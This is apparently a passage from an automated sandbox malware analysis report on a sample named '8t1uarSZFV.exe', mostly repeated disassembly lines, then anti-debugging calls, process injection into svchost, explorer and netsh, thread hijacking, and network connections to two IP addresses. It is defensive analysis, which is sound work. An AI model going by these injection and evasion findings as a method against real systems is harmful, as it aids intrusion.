          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300C5ED mov eax, dword ptr fs:[00000030h]1_2_0300C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300C5ED mov eax, dword ptr fs:[00000030h]1_2_0300C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008402 mov eax, dword ptr fs:[00000030h]1_2_03008402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008402 mov eax, dword ptr fs:[00000030h]1_2_03008402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008402 mov eax, dword ptr fs:[00000030h]1_2_03008402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_02FFE5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_02FFE5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_02FFE5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_02FFE5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_02FFE5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_02FFE5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_02FFE5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE5E7 mov eax, dword ptr fs:[00000030h]1_2_02FFE5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD25E0 mov eax, dword ptr fs:[00000030h]1_2_02FD25E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056420 mov eax, dword ptr fs:[00000030h]1_2_03056420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056420 mov eax, dword ptr fs:[00000030h]1_2_03056420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056420 mov eax, dword ptr fs:[00000030h]1_2_03056420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056420 mov eax, dword ptr fs:[00000030h]1_2_03056420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056420 mov eax, dword ptr fs:[00000030h]1_2_03056420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056420 mov eax, dword ptr fs:[00000030h]1_2_03056420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056420 mov eax, dword ptr fs:[00000030h]1_2_03056420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD65D0 mov eax, dword ptr fs:[00000030h]1_2_02FD65D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E443 mov eax, dword ptr fs:[00000030h]1_2_0300E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E443 mov eax, dword ptr fs:[00000030h]1_2_0300E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E443 mov eax, dword ptr fs:[00000030h]1_2_0300E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E443 mov eax, dword ptr fs:[00000030h]1_2_0300E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E443 mov eax, dword ptr fs:[00000030h]1_2_0300E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E443 mov eax, dword ptr fs:[00000030h]1_2_0300E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E443 mov eax, dword ptr fs:[00000030h]1_2_0300E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300E443 mov eax, dword ptr fs:[00000030h]1_2_0300E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF45B1 mov eax, dword ptr fs:[00000030h]1_2_02FF45B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF45B1 mov eax, dword ptr fs:[00000030h]1_2_02FF45B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308A456 mov eax, dword ptr fs:[00000030h]1_2_0308A456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C460 mov ecx, dword ptr fs:[00000030h]1_2_0305C460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2582 mov eax, dword ptr fs:[00000030h]1_2_02FD2582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2582 mov ecx, dword ptr fs:[00000030h]1_2_02FD2582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308A49A mov eax, dword ptr fs:[00000030h]1_2_0308A49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8550 mov eax, dword ptr fs:[00000030h]1_2_02FD8550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8550 mov eax, dword ptr fs:[00000030h]1_2_02FD8550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030044B0 mov ecx, dword ptr fs:[00000030h]1_2_030044B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A4B0 mov eax, dword ptr fs:[00000030h]1_2_0305A4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE53E mov eax, dword ptr fs:[00000030h]1_2_02FFE53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE53E mov eax, dword ptr fs:[00000030h]1_2_02FFE53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE53E mov eax, dword ptr fs:[00000030h]1_2_02FFE53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE53E mov eax, dword ptr fs:[00000030h]1_2_02FFE53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE53E mov eax, dword ptr fs:[00000030h]1_2_02FFE53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0535 mov eax, dword ptr fs:[00000030h]1_2_02FE0535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0535 mov eax, dword ptr fs:[00000030h]1_2_02FE0535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0535 mov eax, dword ptr fs:[00000030h]1_2_02FE0535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0535 mov eax, dword ptr fs:[00000030h]1_2_02FE0535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0535 mov eax, dword ptr fs:[00000030h]1_2_02FE0535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0535 mov eax, dword ptr fs:[00000030h]1_2_02FE0535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4B00 mov eax, dword ptr fs:[00000030h]1_2_030A4B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304EB1D mov eax, dword ptr fs:[00000030h]1_2_0304EB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03098B28 mov eax, dword ptr fs:[00000030h]1_2_03098B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03098B28 mov eax, dword ptr fs:[00000030h]1_2_03098B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD0AD0 mov eax, dword ptr fs:[00000030h]1_2_02FD0AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03084B4B mov eax, dword ptr fs:[00000030h]1_2_03084B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03084B4B mov eax, dword ptr fs:[00000030h]1_2_03084B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03078B42 mov eax, dword ptr fs:[00000030h]1_2_03078B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03066B40 mov eax, dword ptr fs:[00000030h]1_2_03066B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03066B40 mov eax, dword ptr fs:[00000030h]1_2_03066B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309AB40 mov eax, dword ptr fs:[00000030h]1_2_0309AB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307EB50 mov eax, dword ptr fs:[00000030h]1_2_0307EB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8AA0 mov eax, dword ptr fs:[00000030h]1_2_02FD8AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8AA0 mov eax, dword ptr fs:[00000030h]1_2_02FD8AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A2B57 mov eax, dword ptr fs:[00000030h]1_2_030A2B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A2B57 mov eax, dword ptr fs:[00000030h]1_2_030A2B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A2B57 mov eax, dword ptr fs:[00000030h]1_2_030A2B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A2B57 mov eax, dword ptr fs:[00000030h]1_2_030A2B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA80 mov eax, dword ptr fs:[00000030h]1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0A5B mov eax, dword ptr fs:[00000030h]1_2_02FE0A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0A5B mov eax, dword ptr fs:[00000030h]1_2_02FE0A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD6A50 mov eax, dword ptr fs:[00000030h]1_2_02FD6A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD6A50 mov eax, dword ptr fs:[00000030h]1_2_02FD6A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD6A50 mov eax, dword ptr fs:[00000030h]1_2_02FD6A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD6A50 mov eax, dword ptr fs:[00000030h]1_2_02FD6A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD6A50 mov eax, dword ptr fs:[00000030h]1_2_02FD6A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD6A50 mov eax, dword ptr fs:[00000030h]1_2_02FD6A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD6A50 mov eax, dword ptr fs:[00000030h]1_2_02FD6A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03084BB0 mov eax, dword ptr fs:[00000030h]1_2_03084BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03084BB0 mov eax, dword ptr fs:[00000030h]1_2_03084BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF4A35 mov eax, dword ptr fs:[00000030h]1_2_02FF4A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF4A35 mov eax, dword ptr fs:[00000030h]1_2_02FF4A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEA2E mov eax, dword ptr fs:[00000030h]1_2_02FFEA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307EBD0 mov eax, dword ptr fs:[00000030h]1_2_0307EBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305CBF0 mov eax, dword ptr fs:[00000030h]1_2_0305CBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEBFC mov eax, dword ptr fs:[00000030h]1_2_02FFEBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8BF0 mov eax, dword ptr fs:[00000030h]1_2_02FD8BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8BF0 mov eax, dword ptr fs:[00000030h]1_2_02FD8BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8BF0 mov eax, dword ptr fs:[00000030h]1_2_02FD8BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305CA11 mov eax, dword ptr fs:[00000030h]1_2_0305CA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300CA24 mov eax, dword ptr fs:[00000030h]1_2_0300CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD0BCD mov eax, dword ptr fs:[00000030h]1_2_02FD0BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD0BCD mov eax, dword ptr fs:[00000030h]1_2_02FD0BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD0BCD mov eax, dword ptr fs:[00000030h]1_2_02FD0BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF0BCB mov eax, dword ptr fs:[00000030h]1_2_02FF0BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF0BCB mov eax, dword ptr fs:[00000030h]1_2_02FF0BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF0BCB mov eax, dword ptr fs:[00000030h]1_2_02FF0BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0BBE mov eax, dword ptr fs:[00000030h]1_2_02FE0BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0BBE mov eax, dword ptr fs:[00000030h]1_2_02FE0BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307EA60 mov eax, dword ptr fs:[00000030h]1_2_0307EA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300CA6F mov eax, dword ptr fs:[00000030h]1_2_0300CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300CA6F mov eax, dword ptr fs:[00000030h]1_2_0300CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300CA6F mov eax, dword ptr fs:[00000030h]1_2_0300CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304CA72 mov eax, dword ptr fs:[00000030h]1_2_0304CA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304CA72 mov eax, dword ptr fs:[00000030h]1_2_0304CA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FCCB7E mov eax, dword ptr fs:[00000030h]1_2_02FCCB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4A80 mov eax, dword ptr fs:[00000030h]1_2_030A4A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03008A90 mov edx, dword ptr fs:[00000030h]1_2_03008A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03026AA4 mov eax, dword ptr fs:[00000030h]1_2_03026AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC8B50 mov eax, dword ptr fs:[00000030h]1_2_02FC8B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03026ACC mov eax, dword ptr fs:[00000030h]1_2_03026ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03026ACC mov eax, dword ptr fs:[00000030h]1_2_03026ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03026ACC mov eax, dword ptr fs:[00000030h]1_2_03026ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004AD0 mov eax, dword ptr fs:[00000030h]1_2_03004AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004AD0 mov eax, dword ptr fs:[00000030h]1_2_03004AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEB20 mov eax, dword ptr fs:[00000030h]1_2_02FFEB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEB20 mov eax, dword ptr fs:[00000030h]1_2_02FFEB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300AAEE mov eax, dword ptr fs:[00000030h]1_2_0300AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300AAEE mov eax, dword ptr fs:[00000030h]1_2_0300AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E908 mov eax, dword ptr fs:[00000030h]1_2_0304E908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E908 mov eax, dword ptr fs:[00000030h]1_2_0304E908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C912 mov eax, dword ptr fs:[00000030h]1_2_0305C912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306892B mov eax, dword ptr fs:[00000030h]1_2_0306892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305892A mov eax, dword ptr fs:[00000030h]1_2_0305892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFE8C0 mov eax, dword ptr fs:[00000030h]1_2_02FFE8C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03050946 mov eax, dword ptr fs:[00000030h]1_2_03050946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030A4940 mov eax, dword ptr fs:[00000030h]1_2_030A4940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0301096E mov eax, dword ptr fs:[00000030h]1_2_0301096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0301096E mov edx, dword ptr fs:[00000030h]1_2_0301096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0301096E mov eax, dword ptr fs:[00000030h]1_2_0301096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C97C mov eax, dword ptr fs:[00000030h]1_2_0305C97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD0887 mov eax, dword ptr fs:[00000030h]1_2_02FD0887
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074978 mov eax, dword ptr fs:[00000030h]1_2_03074978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074978 mov eax, dword ptr fs:[00000030h]1_2_03074978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4859 mov eax, dword ptr fs:[00000030h]1_2_02FD4859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4859 mov eax, dword ptr fs:[00000030h]1_2_02FD4859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030589B3 mov esi, dword ptr fs:[00000030h]1_2_030589B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030589B3 mov eax, dword ptr fs:[00000030h]1_2_030589B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030589B3 mov eax, dword ptr fs:[00000030h]1_2_030589B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE2840 mov ecx, dword ptr fs:[00000030h]1_2_02FE2840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030669C0 mov eax, dword ptr fs:[00000030h]1_2_030669C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF2835 mov eax, dword ptr fs:[00000030h]1_2_02FF2835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF2835 mov eax, dword ptr fs:[00000030h]1_2_02FF2835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF2835 mov eax, dword ptr fs:[00000030h]1_2_02FF2835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF2835 mov ecx, dword ptr fs:[00000030h]1_2_02FF2835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF2835 mov eax, dword ptr fs:[00000030h]1_2_02FF2835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF2835 mov eax, dword ptr fs:[00000030h]1_2_02FF2835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030049D0 mov eax, dword ptr fs:[00000030h]1_2_030049D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0309A9D3 mov eax, dword ptr fs:[00000030h]1_2_0309A9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E9E0 mov eax, dword ptr fs:[00000030h]1_2_0305E9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030029F9 mov eax, dword ptr fs:[00000030h]1_2_030029F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030029F9 mov eax, dword ptr fs:[00000030h]1_2_030029F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C810 mov eax, dword ptr fs:[00000030h]1_2_0305C810
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_02FDA9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_02FDA9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_02FDA9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_02FDA9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_02FDA9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_02FDA9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A830 mov eax, dword ptr fs:[00000030h]1_2_0300A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307483A mov eax, dword ptr fs:[00000030h]1_2_0307483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307483A mov eax, dword ptr fs:[00000030h]1_2_0307483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD09AD mov eax, dword ptr fs:[00000030h]1_2_02FD09AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD09AD mov eax, dword ptr fs:[00000030h]1_2_02FD09AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03000854 mov eax, dword ptr fs:[00000030h]1_2_03000854
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]1_2_02FE29A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]1_2_02FE29A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]1_2_02FE29A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]1_2_02FE29A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]1_2_02FE29A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]1_2_02FE29A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]1_2_02FE29A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]1_2_02FE29A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]1_2_02FE29A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]1_2_02FE29A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]1_2_02FE29A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]1_2_02FE29A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE29A0 mov eax, dword ptr fs:[00000030h]1_2_02FE29A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03066870 mov eax, dword ptr fs:[00000030h]1_2_03066870
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_01000B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_01000B62
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FD2622
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FC083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FC083F
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FC09D5 SetUnhandledExceptionFilter,0_2_00FC09D5
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FC0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00FC0C21
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_01569930 SetUnhandledExceptionFilter,3_2_01569930
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_015696E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_015696E0

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 65.21.196.90 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.145 80Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 2580Jump to behavior
          Queues an APC in another process (thread injection)
